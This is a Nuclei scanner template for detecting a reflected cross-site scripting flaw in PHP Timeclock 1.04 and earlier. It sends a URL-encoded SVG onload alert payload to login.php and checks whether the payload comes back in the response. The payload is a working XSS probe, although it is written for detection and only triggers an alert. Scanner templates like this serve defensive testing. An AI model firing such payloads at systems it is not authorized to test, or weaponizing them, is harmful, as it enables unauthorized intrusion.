id: php-timeclock-xss

info:
  name: PHP Timeclock <=1.04 - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: PHP Timeclock 1.04 and prior contains multiple cross-site scripting vulnerabilities via login.php, timeclock.php, reports/audit.php. and reports/timerpt.php
  reference:
    - https://www.exploit-db.com/exploits/49853
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,php,timeclock,edb,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.php/'%3E%3Csvg/onload=alert%60{{randstr}}%60%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<svg/onload=alert`{{randstr}}`>"
          - "PHP Timeclock Admin Login"
        part: body
        condition: and

      - type: word
        words:
          - "text/html"
        part: header

# digest: 4a0a00473045022100ee28d6f4a6d8d0ecc7cb3ade7559a23536297ed6d8dfd393aa8a368b00c2c85b022057dc51c47c0592d5e0dc08a9df730ce718b12e9d350f891f257fe7ea7d4642a9:922c64590222798bb761d5b6d8e72950
